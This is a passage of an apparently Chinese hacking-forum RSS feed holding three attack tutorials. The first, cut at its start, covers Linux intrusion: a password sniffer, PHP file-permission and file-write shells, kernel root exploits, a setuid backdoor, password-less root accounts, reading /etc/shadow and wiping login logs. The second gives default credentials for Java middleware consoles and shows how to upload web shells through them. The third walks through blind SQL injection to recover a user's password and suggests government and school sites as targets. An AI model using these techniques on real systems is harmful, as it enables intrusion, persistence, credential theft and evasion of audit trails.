/usr/include/linux/tcp.h:21,</span><br /><span>from linsniffer.c:32:</span><br /><span>/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include &lt;endian.h&gt; instead!</span><br /><br /><br /><span>不用管警告，直接运行编译后的linsniffer即可。</span><br /><br /><br /><br /><span># ./linsniffer</span><br /><br /><br /><br /><span>用户名和密码都自动存到了tcp.log下。</span><br /><br /><span>3、利用跨站代码</span><br /><span>linux不提权跨目录访问的代码</span><br /><br /><span>linux权限多设的比较松的其实，但有的虚拟机还是不能跨目录访问的。</span><br /><br /><span>在提不了权的情况下，试试如下代码吧。运气好的话说不定就跨过去了。</span><br /><br /><br /><br /><span>代码如下：</span><br /><br /><br /><br /><span>$path = stripslashes($_GET);</span><br /><span>$ok = chmod ($path , 0777);</span><br /><span>if ($ok == true)</span><br /><span>echo CHMOD OK , Permission editable file or directory. Permission to write;</span><br /><span>?&gt;</span><br /><br /><br /><span>把上面代码保存为tmdsb.PHP</span><br /><br /><span>然后访问</span><a class="gj_safe_a" href="http://www.tmdsb.com/tmdsb.php?path=../../" target="_blank" rel="noopener">http://www.tmdsb.com/tmdsb.php?path=../../</a><span>要跨的目录/index.php</span><br /><br /><br /><br /><span>这里的index.PHP是要修改权限的文件。</span><br /><br /><span>收集的另一个exp：</span><br /><br /><span>把下面的代码保存为exp.PHP</span><br /><br /><br /><br /><span>代码：</span><br /><br /><br /><br /><span>@$filename = stripslashes($_POST);</span><br /><span>@$mess = stripslashes($_POST);</span><br /><span>$fp = @fopen({$_POST}, 'a');</span><br /><span>@fputs($fp,$mess</span><br /><span>);</span><br /><span>@fclose($fp);</span><br /><span>?&gt;</span><br /><span>4.2.618最终Linux Kernel &lt; 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)这个0day溢出成功</span><br /><span>udev提权</span><br /><br /><span>换了个udev提权，适用于内核范围为2.6.*。</span><br /><br /><span>还是上传文件至服务器shell所在目录，执行命令ls，发现文件已经躺在那里面了，之后赋予exp执行权限。</span><br /><br /><br /><br /><span>chmod +x pwnkernel.c</span><br /><span>chmod +x wunderbar_emporium.sh</span><br /><span>chmod +x exploit.c</span><br /><span>之后执行溢出./w*</span><br /><br /><br /><span>成功溢出，root权限。</span><br /><br /><br /><br /><span>之后就是留下一个后门~ 添加一个root权限用户俺也不介意。。。（useradd -u 0 -o "username"）</span><br /><br /><br /><br /><span>依次输入命令</span><br /><br /><br /><br /><span>cd /tmp</span><br /><span>sh-3.1# ls /lib/ld-linux*</span><br /><span>/lib/ld-linux.so.2</span><br /><span>sh-3.1# cp /lib/ld-linux.so.2 /tmp/.str1ven</span><br /><span>sh-3.1# ls -l .str1ven</span><br /><span>-rwxr-xr-x 1 root root 121684 07-08 21:13 .str1ven</span><br /><span>sh-3.1# chmod +s .str1ven</span><br /><span>sh-3.1# ls -l .str1ven</span><br /><span>-rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven</span><br /><br /><br /><span>成功建立一个后门，退出root，执行./.str1ven `which whoami`,又成功获取root权限~~</span><br /><br /><span>cat /etc/passwd 查看linux用户</span><br /><br /><span>cat /etc/shadow 查看用户密码需要root权限</span><br /><br /><span>cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息</span><br /><br /><span>ifconfig 查看本机ip信息</span><br /><br /><span>cat /etc/resolv.conf 查看DNS信息</span><br /><br /><span>bash -i 在反弹的shell中使用可以直观显示命令</span><br /><br /><span>bash prompt: 当你以普通限权用户身份进入的时候，一般你会有一个类似bash$的prompt。当你以</span><br /><br /><span>Root登陆时，你的prompt会变成bash#。</span><br /><br /><br /><br /><span>系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。</span><br /><br /><br /><br /><span>echo 1&gt;/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1&gt;/proc/sys/net/ipv4/ip_forward,</span><br /><br /><br /><br /><span>vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!</span><br /><br /><br /><br /><span>netstat -an |grep LISTEN |grep :80 查看端口</span><br /><br /><span>service --status-all | grep running</span><br /><br /><span>service --status-all | grep http</span><br /><br /><br /><br /><span>查看运行服务</span><br /><br /><span>lsb_release -a 查看系统版本</span><br /><br /><span>重启ssh服务 ：</span><br /><br /><span>/usr/sbin/sshd stop/</span><br /><br /><span>usr/sbin/sshd start</span><br /><br /><span>ssd_config文件里</span><br /><br /><span>PasswordAuthentication no,</span><br /><br /><span>将其改为</span><br /><br /><span>Pas</span><br /><br /><br /><br /><br /><br /><span>rdAuthentication yes</span><br /><br /><span>远程ssh才可登录</span><br /><br /><span>否则显示Access denied</span><br /><br /><span>其中Usepam yes可能用来建立pam方式login，比如从其它linux主机ssh到服务端，如果关闭，则不能打开.</span><br /><br /><span>su的菜鸟用法</span><br /><br /><span>先chomod 777 /etc/passwd</span><br /><br /><span>然后修改bin用户的gid和uid为0</span><br /><br /><span>然后passwd设置bin的密码</span><br /><br /><span>然后cp /bin/bash /sbin/nologin</span><br /><br /><span>然后su的时候su - bin就可以到rootshell了。</span><br /><br /><span>这个原理就是当ssh不允许root用ssh终端登陆的时候，我们又不知道root密码的一种很菜鸟的做法。</span><br /><br /><br /><br /><span>还可以这样</span><br /><br /><br /><br /><span>sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd</span><br /><span>gcc prtcl2.c –o local –static –Wall</span><br /><span>echo "nosec:x:0:0::/:/bin/sh" &gt;&gt; /etc/passwd</span><br /><span>echo "nosec::-1:-1:-1:-1:-1:-1:500" &gt;&gt; /etc/shadow</span><br /><br /><br /><br /><br /><span>清空last记录 cp /dev/null /var/log/wtmp</span><br /><br /><span>-----</span><br /><br /><span>dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel &lt;= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的</span><br /><br /><span>/etc/init.d/ssh start    开22端口</span><br /><br /><span>/etc/ssh/sshd_config SSH服务配置文件</span></p>]]></content:encoded>
						                            <category domain="https://itprosec.com/community/hacking/">Hacking</category>                        <dc:creator>tai chi</dc:creator>
                        <guid isPermaLink="true">https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%a6%82%e4%bd%95%e5%85%a5%e4%be%b5linux%e6%9c%8d%e5%8a%a1%e5%99%a8%ef%bc%9f%e6%8e%8c%e6%8f%a1%e8%bf%99%e5%87%a0%e4%b8%aa%e5%91%bd%e4%bb%a4%e5%a4%9f%e4%ba%86/</guid>
                    </item>
				                    <item>
                        <title>黑客入门web中间件拿shell-Weblogic</title>
                        <link>https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%85%a5%e9%97%a8web%e4%b8%ad%e9%97%b4%e4%bb%b6%e6%8b%bfshell-weblogic/</link>
                        <pubDate>Mon, 06 Apr 2020 02:27:38 +0000</pubDate>
                        <description><![CDATA[1.weblogic后台页面：（http为7001，https为7002）Google关键字：WebLogic Server AdministrationConsole inurl:console默认的用户名密码1、用户名密码均为：weblogic2、用户名密码均为：system3、用户名密码均为：portaladmin4、用户名密码均为：guest上传地方：workshop&amp;...]]></description>
                        <content:encoded><![CDATA[<p><span>1.weblogic</span><br /><img id="aimg_432" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144817beg5gd1d5t8kqstw.jpg" width="552" height="380" /><span></span><br /><span>后台页面：（http为7001，https为7002）</span><br /><span>Google关键字：WebLogic Server AdministrationConsole inurl:console</span><br /><span>默认的用户名密码</span><br /><span>1、用户名密码均为：weblogic</span><br /><span>2、用户名密码均为：system</span><br /><span>3、用户名密码均为：portaladmin</span><br /><span>4、用户名密码均为：guest</span><br /><span>上传地方：</span><br /><span>workshop&gt; Deployments&gt; Web应用程序&gt; 部署新的 Web 应用程序模块…</span><br /><span>上传war的webshell。</span><br /><img id="aimg_433" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144818uxjcv0zfrxpxfjcv.jpg" width="552" /><span></span><br /><span>上传后目标模块-&gt;部署。</span><br /><br /><span>2.Tomcat</span><br /><span>后台：</span><a class="gj_safe_a" href="http://172.16.102.35:8080/manager/html" target="_blank" rel="noopener">http://172.16.102.35:8080/manager/html</a><br /><span>默认用户名密码</span><br /><span>tomcat tomcat</span><br /><span>上传地方：</span><br /><img id="aimg_434" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144819cn6w4s6jmtkt61v5.jpg" width="334" /><span></span><br /><span>Deploy之后即发布成功</span><br /><span>shell地址：</span><a class="gj_safe_a" href="http://172.16.102.35:8080/magerx/test.jsp" target="_blank" rel="noopener">http://172.16.102.35:8080/magerx/test.jsp</a><span>(其中magerx为war包的名字）</span><br /><img id="aimg_435" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144819fxqty8htqtdhrhud.jpg" width="554" /><span></span><br /><span>3.jboss</span><br /><span>后台：</span><a class="gj_safe_a" href="http://172.16.102.35:9990/" target="_blank" rel="noopener">http://172.16.102.35:9990</a><br /><span>上传地方：Deployments&gt;Manage Deployments&gt;Add Content</span><br /><img id="aimg_436" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144819k2zfr2f1dy6nj5if.jpg" width="549" /><span></span><br /><span>Enable后即可发布</span><br /><span>shell地址：</span><br /><a class="gj_safe_a" href="http://172.16.102.35:8080/magerx/test.jsp" target="_blank" rel="noopener">http://172.16.102.35:8080/magerx/test.jsp</a><br /><img id="aimg_437" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144820bzy5aw45z44529wa.jpg" width="552" /><span></span><br /><span>4.JOnAS</span><br /><span>后台：</span><a class="gj_safe_a" href="http://172.16.102.35:9000/jonasAdmin/" target="_blank" rel="noopener">http://172.16.102.35:9000/jonasAdmin/</a><br /><span>默认用户名密码：</span><br /><span>jadmin jonas</span><br /><span>tomcat tomcat</span><br /><span>jonas jonas</span><br /><span>上传地方：Deployment&gt;Web Modules (WAR)&gt;Upload</span><br /><img id="aimg_438" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144820ccl2kk28cc0hh3ck.jpg" width="550" /><span></span><br /><br /><span>Apply之后即可发布</span><br /><span>shell地址:</span><a class="gj_safe_a" href="http://172.16.102.35:9000/magerx/test.jsp" target="_blank" rel="noopener">http://172.16.102.35:9000/magerx/test.jsp</a><br /><img id="aimg_439" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144820zq1qfttf21tfwf1m.jpg" width="548" /><span></span><br /><span>5.WebSphere</span><br /><span>后台地址:</span><a class="gj_safe_a" href="https://172.16.102.35:9043/ibm/console/logon.jsp" target="_blank" rel="noopener">https://172.16.102.35:9043/ibm/console/logon.jsp</a><br /><span>上传地方:应用程序&gt;新建应用程序&gt;新建企业应用程序</span><br /><img id="aimg_440" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144821zf9gqzyzpg9vecyq.jpg" width="551" /><span> </span><span></span><img id="aimg_441" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144822uzzs61gu6vpv4svh.jpg" width="549" /><span></span><br /><span>接下来各种下一步，步骤4注意填好“上下文根”</span><br /><img id="aimg_442" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144823sijiz569ee6u9oo6.jpg" width="547" /><span></span><br /><span>完成后单击保存</span><br /><img id="aimg_443" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144824b0b792b90k63owd7.jpg" width="552" /><span></span><br /><span>回到应用程序&gt;应用程序类型&gt;WebSphere 企业应用程序</span><br /><img id="aimg_444" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201710/08/144825tnxgwrz3kuufybyx.jpg" width="551" /><span></span><br /><span>选中你上传的war包 这里是paxmac  点击启动 即可发布</span><br /><span>shell地址:</span><a class="gj_safe_a" href="http://172.16.102.35:9080/paxmac/test.jsp" target="_blank" rel="noopener">http://172.16.102.35:9080/paxmac/test.jsp</a><br /><span>&lt;!–</span><br /><span>jsp文件打包，可以使用jdk/JRE自带的jar命令：</span><br /><span>切换到要打包的文件目录</span><br /><span>jar -cvf magerx.war  test.jsp –&gt;</span></p>]]></content:encoded>
						                            <category domain="https://itprosec.com/community/hacking/">Hacking</category>                        <dc:creator>tai chi</dc:creator>
                        <guid isPermaLink="true">https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%85%a5%e9%97%a8web%e4%b8%ad%e9%97%b4%e4%bb%b6%e6%8b%bfshell-weblogic/</guid>
                    </item>
				                    <item>
                        <title>如何使用sql注入攻破一个网站？</title>
                        <link>https://itprosec.com/community/hacking/%e5%a6%82%e4%bd%95%e4%bd%bf%e7%94%a8sql%e6%b3%a8%e5%85%a5%e6%94%bb%e7%a0%b4%e4%b8%80%e4%b8%aa%e7%bd%91%e7%ab%99%ef%bc%9f/</link>
                        <pubDate>Mon, 06 Apr 2020 02:25:22 +0000</pubDate>
                        <description><![CDATA[SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意的）SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。黑客新手常用的sql注入就是使用一些注入工具，...]]></description>
                        <content:encoded><![CDATA[<table cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td id="postmessage_974" class="t_f">SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意的）SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。<br />黑客新手常用的sql注入就是使用一些注入工具，比如：啊D，明小子一些的简单sql注入工具。现在的网站能够用sql注入的漏洞已经很少了，一般政府和学校的网站漏洞比较多，可以作为肉鸡试一试。<br />下面讲一下早些年的sql简单方法：<br />首先我们在一个具备sql注入漏洞的网站开始实战测试（实验网站已经通知修复）<br />前提准备：<br /><br />肉鸡网站：<a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?name" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?name</a><br /><br />用户名：admin 密码：admin<br /><br />所需sql注入语句：<br /><br />1.判断有无注入点<br />; and 1=1 and 1=2<br /><br />2.猜表一般的表的名称无非是admin adminuser user pass password 等..<br />and 0&lt;&gt;(select count(*) from *)<br />and 0&lt;&gt;(select count(*) from admin) ---判断是否存在admin这张表<br /><br />3.猜帐号数目 如果遇到0&lt; 返回正确页面 1&lt;返回错误页面说明帐号数目就是1个<br />and 0&lt;(select count(*) from admin)<br />and 1&lt;(select count(*) from admin)<br /><br />4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.<br />and 1=(select count(*) from admin where len(*)&gt;0)--<br />and 1=(select count(*) from admin where len(用户字段名称name)&gt;0)<br />and 1=(select count(*) from admin where len(_blank&gt;密码字段名称password)&gt;0)<br /><br />5.猜解各个字段的长度 猜解长度就是把&gt;0变换 直到返回正确页面为止<br />and 1=(select count(*) from admin where len(*)&gt;0)<br />and 1=(select count(*) from admin where len(name)&gt;6) 错误<br />and 1=(select count(*) from admin where len(name)&gt;5) 正确 长度是6<br />and 1=(select count(*) from admin where len(name)=6) 正确<br /><br />and 1=(select count(*) from admin where len(password)&gt;11) 正确<br />and 1=(select count(*) from admin where len(password)&gt;12) 错误 长度是12<br />and 1=(select count(*) from admin where len(password)=12) 正确<br /><br />6.猜解字符<br />and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位<br />and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位<br />就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了<br />and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --<br />这个查询语句可以猜解中文的用户和_blank&gt;密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.<br /><br />开始sql入侵：<br /><img id="aimg_534" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125449qfg8kgfk7p6pgl60.jpg" width="546" /><br />SQL注入漏洞测试:<br /><br />在正常用户名admin后增加一个单引号，单击"登录"<br />或在URL地址栏直接输入<a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?name=admin'&amp;pass=admin</a><br />若出错，证明没有对'进行过滤，存在SQL注入漏洞<br /><img id="aimg_535" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125449vz6hm6cq9v6qh16f.jpg" width="546" /><br />在正常用户名admin后增加一个单引号，单击"登录"<br /><img id="aimg_536" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125449er3hvdimhhsplnfn.jpg" width="576" /><br />出错<br /><img id="aimg_537" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125449kkxie2z2h8sfq9hi.jpg" width="576" /><br />在URL地址栏直接输入<a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?name=admin'&amp;pass=admin</a><br /><br />登录出错<br /><img id="aimg_538" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125449mx4smi38dm6am8tm.jpg" width="576" /><br />登录出错，证明存在SQL注入漏洞。<br /><br />3.SQL注入攻击<br /><br />构造可以正常运行的目标地址<br /><br />输入<a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?name=admin</a><span> </span>&amp;pass=admin' and '1=1<br />原SQL语句为SELECT * FROM data Where uname='admin'，条件未变，但接收密码为admin' and '1=1<br />登录失败<br /><img id="aimg_539" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125450rtqg5qqtuhqfpbhh.jpg" width="600" /><br />输入<a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin'</a><span> </span>and 1=1 and 'a'='a<br />原SQL语句为SELECT * FROM data Where uname='admin' and 1=1 and 'a'='a'<br />登录成功<br /><img id="aimg_540" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125450xfmame90k0gclufz.jpg" width="600" /><br />可以正常运行的目标地址已经构造成功，此时可将1＝1部分用SQL查询语句替代，依次对数据库表名、表中字段名、用户和密码长度、用户和密码进行测试<br /><br />4. 猜解数据库表名<br /><br /><a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin'</a><span> </span>and (select count(*) from data)&gt;0 and 'a'='a<br /><img id="aimg_541" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125450tnhtkhoionqqfm1a.jpg" width="600" /><br />成功，说明数据表名确为data；若不成功，则可反复测试，直至成功猜出表名<br />5. 猜解数据库字段名<br /><br /><a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin'and</a><span> </span>(select count(uname) from data)&gt;0 and 'a'='a<br />若用户名字段确为uname，则提示登录成功<br />同理可猜出密码字段为upass<br /><img id="aimg_542" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125450fa9jstc8hcw8jht8.jpg" width="600" /><br />猜测用户名字段为name，登录出错<br /><img id="aimg_543" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125450g4itosdobkus8sib.jpg" width="600" /><br />猜测用户名字段为uname，登录成功<br /><img id="aimg_544" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125450u0o690vkjguuouo3.jpg" width="600" /><br />猜测密码字段为upass，登录成功<br /><br />说明数据库中密码字段为upass<br /><br />6．猜解密码长度<br /><br />已知有一用户名为"wucm"，首先猜其密码长度大于1<br /><a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin'</a><span> </span>and (Select count(*) from data where uname='wucm' and len(upass)&gt;1)&gt;0 and 'a'='a<br /><img id="aimg_545" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125450higfb6inok1iaa0m.jpg" width="600" /><br />成功，说明用户"wucm"的密码大于1， 继续猜测密码长度小于10<br /><br /><a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin'</a><span> </span>and (Select count(*) from data where uname='wucm' and len(upass)&lt;10)&gt;0 and 'a'='a<br /><img id="aimg_546" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125451n13jpj0rq33kcv15.jpg" width="600" /><br />成功，说明"wucm"的密码长度小于10位，继续猜测其密码长度小于5<br /><br /><a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin'</a><span> </span>and (Select count(*) from data where uname='wucm' and len(upass)&lt;5)&gt;0 and 'a'='a<span> </span><img id="aimg_547" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125451kpy3zu7xee49fy3p.jpg" width="600" /><br />出错，说明"wucm"的密码长度大于5位，继续猜测其密码长度大于8位<br /><br /><a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin'</a><span> </span>and (Select count(*) from data where uname='wucm' and len(upass)&gt;8)&gt;0 and 'a'='a<br /><img id="aimg_548" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125451rwx5xomvzvfbzrbv.jpg" width="600" /><br />出错，说明"wucm"的密码长度小于8位，继续猜测其密码长度等于6位<br /><br /><a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin'</a><span> </span>and (Select count(*) from data where uname='wucm' and len(upass)=6)&gt;0 and 'a'='a<br /><img id="aimg_549" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125451rnfn4wjrk4f4wtkk.jpg" width="600" /><br />成功，说明"wucm"的密码长度为6位<br /><br />7.猜解密码<br /><br />根据前面的测试我们已经知道该用户的密码长度位6位，接下来对密码进行逐位猜测：<br /><br />首先测试第一位是否为数字<br /><br /><a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin'</a><span> </span>and (Select count(*) from data where uname='wucm' and mid(upass,1,1)&lt;'9')&gt;0 and 'a'='a<br /><img id="aimg_550" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125451dmtmppnttkcnmjcj.jpg" width="600" /><br />出错，说明密码第一位不是数字， 测试是否位字母<br /><br /><a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin'</a><span> </span>and (Select count(*) from data where uname='wucm' and mid(upass,1,1)&gt;'a')&gt;0 and 'a'='a<br /><img id="aimg_551" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125451uodaz6p25kak76sj.jpg" width="600" /><br />成功，基本说明密码第一位是字母， 接下来重复测试，不断缩小字母范围，最后确定密码第一位为字母"w"<br /><br /><a class="gj_safe_a" href="http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin" target="_blank" rel="noopener">http://172.18.3.13:81/login.asp?pass=admin&amp;name=admin'</a><span> </span>and (Select count(*) from data where uname='wucm' and mid(upass,1,1)='w')&gt;0 and 'a'='a<span> </span><img id="aimg_552" class="zoom" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125451g1wvpebl4bwvnv1p.jpg" width="527" /><br />成功，说明密码第一位位"w"<br /><br />同理对6位密码逐位进行猜测，最后得到密码为"wcm987"<br /><br />至此我们就猜测出用户"wucm"的密码为"wcm987"，进行登陆测试：<br /><br /></td>
</tr>
</tbody>
</table>
<div class="pattl">
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid573" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTczfDNlMTZlNTdlfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">76d6e7db6a9c2f78bfd762160b08ac95.jpg</a><span> </span><em class="xg1">(51.41 KB, 下载次数: 47)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_573" class="zoom" title="76d6e7db6a9c2f78bfd762160b08ac95.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125852lmkr09r22krcrkhd.jpg" alt="76d6e7db6a9c2f78bfd762160b08ac95.jpg" width="527" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid572" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTcyfDY4NDI2MmYwfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">4773735f9deb76f05b8999dcdd2af7e4.jpg</a><span> </span><em class="xg1">(37.54 KB, 下载次数: 51)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_572" class="zoom" title="4773735f9deb76f05b8999dcdd2af7e4.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125852vh570jj3qkq5qmch.jpg" alt="4773735f9deb76f05b8999dcdd2af7e4.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid571" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTcxfDY4YTAxMjVlfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">9921e5e152ecb621830597471226f19d.jpg</a><span> </span><em class="xg1">(38.36 KB, 下载次数: 42)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_571" class="zoom" title="9921e5e152ecb621830597471226f19d.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125852yt9bji7ef19jjeke.jpg" alt="9921e5e152ecb621830597471226f19d.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid570" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTcwfDMwOWNmOTRkfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">69e203f20ab425e66aa8d501e3edbef3.jpg</a><span> </span><em class="xg1">(39.5 KB, 下载次数: 49)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_570" class="zoom" title="69e203f20ab425e66aa8d501e3edbef3.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125852bfu0b5bfuuzujzcu.jpg" alt="69e203f20ab425e66aa8d501e3edbef3.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid569" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTY5fDdlOGViZDU2fDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">a6007998e3a60c80bf3d7499156857e9.jpg</a><span> </span><em class="xg1">(39.01 KB, 下载次数: 41)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_569" class="zoom" title="a6007998e3a60c80bf3d7499156857e9.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125852bbctbpj0d5i7rb5z.jpg" alt="a6007998e3a60c80bf3d7499156857e9.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid568" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTY4fGM3NzBkYTZjfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">143bb4eb673d0d767d265efd92b049eb.jpg</a><span> </span><em class="xg1">(34.44 KB, 下载次数: 45)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_568" class="zoom" title="143bb4eb673d0d767d265efd92b049eb.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125852qpgfqd6qq00uznqq.jpg" alt="143bb4eb673d0d767d265efd92b049eb.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid567" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTY3fGExYWZjNWQ5fDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">b5ff46b394133fa4d7b5322438377127.jpg</a><span> </span><em class="xg1">(38.3 KB, 下载次数: 51)</em></p>
<p class="mbn"> </p>
